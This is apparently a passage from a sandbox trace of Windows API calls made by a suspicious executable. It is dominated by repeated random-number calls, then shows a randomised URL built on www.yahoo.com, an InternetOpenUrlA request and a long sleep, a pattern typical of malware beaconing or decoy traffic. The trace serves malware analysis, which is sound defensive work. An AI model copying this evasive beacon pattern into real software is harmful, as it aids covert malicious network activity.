cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.752] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.752] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0184.752] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.753] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a022b0, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a022b0) returned 0x0 [0184.753] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.753] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.753] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.753] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.753] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.753] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.754] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.754] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.754] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.755] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.755] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.755] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.755] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.756] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.756] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.756] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0184.757] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.757] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.757] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0184.758] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a022c8, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x3a022c8) returned 0x0 [0184.758] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.758] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.758] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.759] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.759] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.759] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.760] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.760] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.760] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.761] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.912] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0184.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0184.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a022df, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x3a022df) returned 0x0 [0184.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.917] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.917] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.917] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.918] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.918] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.918] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.918] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.920] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.920] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.920] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.920] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.922] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.922] GetProcessHeap () returned 0x440000 [0184.922] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0184.922] lstrcpyA (in: lpString1=0x472b10, lpString2="\x06Ë\x81Äs://www.yahoo.com" | out: lpString1="\x06Ë\x81Äs://www.yahoo.com") returned="\x06Ë\x81Äs://www.yahoo.com" [0184.922] lstrcatA (in: lpString1="\x06Ë\x81Äs://www.yahoo.com", lpString2="/i1zpfjicij6gVxv03oIIfg9iticRafgmpvnt1Tipfjexso56/djgbf47mFgsmfgvxsmfnhvZdVWfW1hfreG6g6Pahit87o/8ufj29iS9nUfqd6y2oWegn7/qig1evumxowujb2qisfjnD/Kdq7McMUr7V5xo6vlEAleosknzeec3aclmrHvx/" | out: lpString1="\x06Ë\x81Äs://www.yahoo.com/i1zpfjicij6gVxv03oIIfg9iticRafgmpvnt1Tipfjexso56/djgbf47mFgsmfgvxsmfnhvZdVWfW1hfreG6g6Pahit87o/8ufj29iS9nUfqd6y2oWegn7/qig1evumxowujb2qisfjnD/Kdq7McMUr7V5xo6vlEAleosknzeec3aclmrHvx/") returned="\x06Ë\x81Äs://www.yahoo.com/i1zpfjicij6gVxv03oIIfg9iticRafgmpvnt1Tipfjexso56/djgbf47mFgsmfgvxsmfnhvZdVWfW1hfreG6g6Pahit87o/8ufj29iS9nUfqd6y2oWegn7/qig1evumxowujb2qisfjnD/Kdq7McMUr7V5xo6vlEAleosknzeec3aclmrHvx/" [0184.922] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0184.922] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x06Ë\x81Äs://www.yahoo.com/i1zpfjicij6gVxv03oIIfg9iticRafgmpvnt1Tipfjexso56/djgbf47mFgsmfgvxsmfnhvZdVWfW1hfreG6g6Pahit87o/8ufj29iS9nUfqd6y2oWegn7/qig1evumxowujb2qisfjnD/Kdq7McMUr7V5xo6vlEAleosknzeec3aclmrHvx/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0184.922] GetProcessHeap () returned 0x440000 [0184.922] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0184.922] GetProcessHeap () returned 0x440000 [0184.922] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02250 | out: hHeap=0x440000) returned 1 [0184.923] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0184.923] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0184.923] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0184.924] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0184.924] Sleep (dwMilliseconds=0x14a6a) [0185.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0185.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0185.089] GetProcessHeap () returned 0x440000 [0185.089] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02450 [0185.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0185.090] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02451, cbBuffer=0x2b, dwFlags=0x2 | out: pbBuffer=0x3a02451) returned 0x0 [0185.090] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.092] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.092] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.092] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.092] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.093] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.093] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.093] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.093] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.093] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.094] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.094] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.094] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.094] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.095] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.095] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.095] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.096] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.096] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.096] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.096] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.097] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.097] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.097] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.097] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.097] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.097] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.097] BCryptGenRandom 